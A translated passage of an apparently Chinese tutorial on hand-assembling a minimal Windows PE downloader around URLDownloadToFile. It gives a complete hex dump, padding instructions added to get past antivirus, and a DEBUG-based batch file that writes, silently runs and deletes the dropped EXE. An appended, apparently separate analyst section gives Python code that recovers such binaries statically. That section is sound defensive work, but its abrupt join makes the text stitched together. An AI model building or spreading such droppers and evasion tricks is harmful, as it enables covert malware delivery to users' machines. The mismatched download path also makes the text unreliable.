So what exactly goes into these places? Broadly speaking, there are three parts:
1. The import table, including the string for the function "URLDownloadToFile" and the string for the DLL "URLMON.DLL".
2. The file's executable machine code.
3. The data the function needs.
First the import table. From what the previous section said, we can easily work out that "URLDownloadToFile" should be filled in at the location "58 11 00 00". Of course you can change this value; it is simply the one I chose. In short, wherever you decide to put the import table, "58 11 00 00" has to point to that location. So at offset 00000158 in the PE file we write the string "31 00 URLDownloadToFile"; the two leading hex bytes are the ordinal (hint), which gives the loader the information it uses to look up the export address in the DLL.
(By the way, let me explain something here. This document also annotates a lot of "points to note"; why? Look closely at them and you will find they are all about positions. That is because the vast majority of addresses in a PE file are the addresses things will have in memory after the file is loaded. On one hand that speeds up loading, and on the other it saves the loader a lot of work. Take the address "58 11 00 00": because our load position is 1000H, the corresponding position in the file is 158H. One thing I should make clear: not every address can be calculated this way. We set PointerToRawData to 100H precisely so that relative addresses are this easy to compute; for other PE files, working out the file offset from this kind of memory address is not that simple, ^_^.. Of course there are plenty of such conversion functions on the net, RVA to OFFSET.)
Then fill in the string URLMON.DLL at the address pointed to by "6E 11 00 00"; naturally this value can be changed too.
Finally, note down with a pen where the exported address of this function will be stored, which is "20 11 00 00".
[Note: all of the operations above relate to the IMAGE_IMPORT_DESCRIPTOR and IMAGE_THUNK_DATA32 structures; if they are unclear, go and study those two structures.]
Next comes the executable code. Our goal is simple: this PE file only has to download a file, so all we need to do is call the URLDownloadToFile function. Write a short piece of assembly (remember the way of calling URLDownloadToFile described earlier, the one I spent some ink on?):
Code:
    PUSH 0          ;6A 00
    PUSH 0          ;6A 00
    PUSH XXXXXXXX   ;68 XXXXXXXX
    PUSH XXXXXXXX   ;68 XXXXXXXX
    PUSH 0          ;6A 00
    CALL XXXXXXXX   ;E8 XXXXXXXX
Since the function follows the PASCAL calling convention, that is STDCALL, with arguments pushed from right to left, our last parameter is pushed first. Finally we CALL the URLDownloadToFile function.
The first two XXXXXXXX addresses are the addresses of the two strings, i.e. the two important parameters of URLDownloadToFile; the last XXXXXXXX is the function's address in memory (the operating system fills it in for us; remember the "20 11 00 00" I said to note down above?).
That is essentially all the code. But then something unfortunate happened: when I used WINHEX to fill this code into the PE skeleton and saved it, the antivirus software deleted it!!!! They treat this as a virus???? So writing a virus is that easy (.....一_一.)....
Luckily I had a backup (if not, I would have cried myself to death.....). I modified the code and added some junk (things like MOV EAX,1)... The final finished code is:
Code:
    B8 01000000     ;mov eax,1
    6A 00           ;push 0
    6A 00           ;push 0
    68 D0114000     ;push D0114000  ;points to where you stored the local path string; in this article it is "c:\\gl123\\00204.jpg", note the double backslashes.
    68 A0114000     ;push A0114000  ;points to where the URL string to download is stored
    6A 00           ;push 0
    E8 02000000     ;call 02000000  ;i.e. call the address two bytes further on; this is the usual way a function call is done in machine code
    C9              ;leave
    C3              ;ret
    FF25 20114000   ;jmp 20114000   ;this jump address is the "20 11 00 00"; as for the "40", that is the program's suggested load base "00400000". Note also that the bytes here are stored in reversed (little-endian) order.
    00 00 00 00
Where do we write them? That is up to you, but please look back at what was said above: there is an address (the one at Note 1), AddressOfEntryPoint, which locates the execution entry of your code. We put the code right after the import table, at the location "00000179H".
Lastly come the addresses of the two strings, which we have already given in the program:
Code:
    68 D0114000
    68 A0114000
So the positions of the two strings are fixed. One is "000001D0H"; the address of the file we want to download, "/Article/UploadFiles/200408/20040818230017329.JPG", is saved here.. I allocated 48 bytes of storage for each; you can set it according to your own needs. Don't forget that the DOS header also has 56 blank bytes that can hold data; if you need them, just change the pointers.
The point of all that verbiage above, and of the format I deliberately walked through, is to make things clear enough that you could just as easily call any other API function instead of being limited to URLDownloadToFile. ^_^... For instance those... those... features.... (I didn't say anything... heh heh)..
OK, the final finished PE skeleton of this PE file looks like this:
Code:
Offset    0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F
00000000  4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00  MZ..............
00000010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000030  00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00  ............@...
00000040  50 45 00 00 4C 01 02 00 00 00 00 00 00 00 00 00  PE..L...........
00000050  00 00 00 00 70 00 0F 01 0B 01 00 00 00 02 00 00  ....p...........
00000060  00 00 00 00 00 00 00 00 79 01 00 00 00 00 00 00  ........y.......
00000070  00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00  ......@.........
00000080  00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00  ................
00000090  00 30 00 00 00 02 00 00 00 00 00 00 02 00 00 00  .0..............
000000A0  00 01 00 00 00 00 00 00 00 01 00 00 00 10 00 00  ................
000000B0  00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00  ................
000000C0  28 11 00 00 28 00 00 00 00 00 00 00 00 00 00 00  (...(...........
000000D0  00 02 00 00 00 10 00 00 00 02 00 00 00 01 00 00  ................
000000E0  00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60  ............`..`
000000F0  00 00 00 00 00 00 00 00 02 00 00 00 00 20 00 00  ............. ..
00000100  00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000110  00 00 00 00 60 00 00 60 00 00 00 00 00 00 00 00  ....`..`........
00000120  58 11 00 00 00 00 00 00 50 11 00 00 00 00 00 00  X.......P.......
00000130  00 00 00 00 6E 11 00 00 20 11 00 00 00 00 00 00  ....n... .......
00000140  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000150  58 11 00 00 00 00 00 00 31 00 55 52 4C 44 6F 77  X.......1.URLDow
00000160  6E 6C 6F 61 64 54 6F 46 69 6C 65 41 00 00 75 72  nloadToFileA..ur
00000170  6C 6D 6F 6E 2E 64 6C 6C 00 B8 01 00 00 00 6A 00  lmon.dll......j.
00000180  6A 00 68 D0 11 40 00 68 A0 11 40 00 6A 00 E8 02  j.h..@.h..@.j...
00000190  00 00 00 C9 C3 FF 25 20 11 40 00 00 00 00 00 00  ......% .@......
000001A0  68 74 74 70 3A 2F 2F 77 77 77 2E 73 65 72 67 65  http://www.serge
000001B0  61 75 72 61 2E 6E 65 74 2F 54 47 50 2F 30 30 32  aura.net/TGP/002
000001C0  2F 69 6D 61 67 65 73 2F 30 34 2E 6A 70 67 00 00  /images/04.jpg..
000001D0  43 3A 5C 5C 47 4C 31 32 33 5C 5C 30 30 32 30 34  C:\\GL123\\00204
000001E0  2E 4A 50 47 00 00 00 00 00 00 00 00 00 00 00 00  .JPG............
000001F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
Simply run this PE file and the picture gets downloaded to the GL123 folder on drive C, which shows our work succeeded. (Wow, what a sexy girl, drool drool.....)
6. Packaging
From here on we have our EXE; now DEBUG takes the stage. The plan is to use the E command to write in the entire PE file data and then the W command to save it to a temporary file, which produced this initial BAT file:
Code:
    ;echo off
    ;DEBUG<%~s0>nul2>nul
    ;GOTO BEGIN
    E 100 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    E 110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    ......
    ......(a number of rows omitted here)
    ......
    RCX
    200
    N E:\tmp\tmp99.TMP
    W
    Q
    :BEGIN
    rename E:\tmp\tmp99.TMP tmp99.EXE>nul2>nul
    call E:\tmp\tmp99.EXE
    del E:\tmp\tmp99.EXE>nul2>nul
But that is very ugly... so I thought of another way to optimise it: use the F command to fill 512 bytes of 00 and then write the required data at the relative positions, which produced the beta1 version of the download bat script. This is the complete batch file:
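The same DEBUG-script layout is what an analyst meets when such a batch file turns up on a host, and the useful response is to recover the embedded binary without ever running DEBUG or the file it would drop. The script below is an added example, not part of the article: it replays the E, F, RCX, N and W commands against a blank 64 KiB segment and returns the file name and the bytes that W would have written, then checks whether the result is a PE and lists its printable strings. The sample script, its path and its URL are constructed for this example (nothing in them comes from the page); the replay assumes W writes CX bytes from DS:100 with BX = 0 and starts from zeroed memory, which real DEBUG does not guarantee (that is precisely why the author's F-fill variant gives deterministic output).

```python
import re

# Constructed sample in the shape the text describes: comment lines that cmd.exe executes,
# an F fill, E writes at relative positions, then RCX / N / W / Q. Bytes, path and URL are
# invented for this example and do not come from the page.
SAMPLE_SCRIPT = r"""
;echo off
;DEBUG<%~s0>nul2>nul
;GOTO BEGIN
F 100 L 200 00
E 100 4D 5A
E 13C 40 00 00 00
E 140 50 45 00 00 4C 01
E 1A0 "http://example.invalid/sample.bin" 00
RCX
200
N C:\TEMP\DROP.TMP
W
Q
:BEGIN
rem cmd.exe section, ignored by the extractor
"""


def _data_list(tokens):
    """An E/F data list: hex bytes and "quoted strings", both of which DEBUG accepts."""
    out = bytearray()
    for t in tokens:
        if len(t) >= 2 and t[0] == '"' == t[-1]:
            out += t[1:-1].encode("ascii")
        else:
            out.append(int(t, 16))
    return bytes(out)


def extract_from_debug_script(text):
    """Replay the DEBUG commands against a blank segment; return (filename, bytes W would write)."""
    mem = bytearray(0x10000)          # assumed zeroed; the F command is what makes this explicit
    cx = name = output = None
    lines = iter(text.splitlines())
    for raw in lines:
        toks = re.findall(r'"[^"]*"|\S+', raw)
        if not toks:
            continue
        cmd = toks[0].upper()
        if cmd == "E":                # E addr list: write bytes at addr
            addr, data = int(toks[1], 16), _data_list(toks[2:])
            mem[addr:addr + len(data)] = data
        elif cmd == "F":              # F start L len list  |  F start end list: fill a range
            start = int(toks[1], 16)
            if toks[2].upper() == "L":
                length, data = int(toks[3], 16), _data_list(toks[4:])
            else:
                length, data = int(toks[2], 16) - start + 1, _data_list(toks[3:])
            mem[start:start + length] = (data * (length // len(data) + 1))[:length]
        elif cmd == "RCX":            # RCX, then the new value on the next line (inline tolerated)
            cx = int(toks[1] if len(toks) > 1 else next(lines).strip(), 16)
        elif cmd == "N":              # N filename
            name = toks[1]
        elif cmd == "W":              # W [addr]: write CX bytes from addr (default 100); BX assumed 0
            if cx is None:
                raise ValueError("W before RCX")
            start = int(toks[1], 16) if len(toks) > 1 else 0x100
            output = bytes(mem[start:start + cx])
        elif cmd == "Q":
            break
    if output is None or name is None:
        raise ValueError("script never wrote a file (missing RCX/N/W)")
    return name, output


def summarize(data):
    """Quick look at the recovered file: is it a PE, and which printable strings does it carry?"""
    is_pe = False
    if data[:2] == b"MZ" and len(data) >= 0x40:
        e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
        is_pe = data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"
    strings = [s.decode("ascii") for s in re.findall(rb"[\x20-\x7e]{8,}", data)]
    return {"size": len(data), "is_pe": is_pe, "strings": strings}
```

On the sample, extract_from_debug_script returns the N path and 512 bytes starting with MZ, and summarize reports is_pe True together with the URL the script embedded; the recovered bytes can then be fed to the import parser from the previous example or to any other static tool, and the URL and path become indicators to hunt for elsewhere.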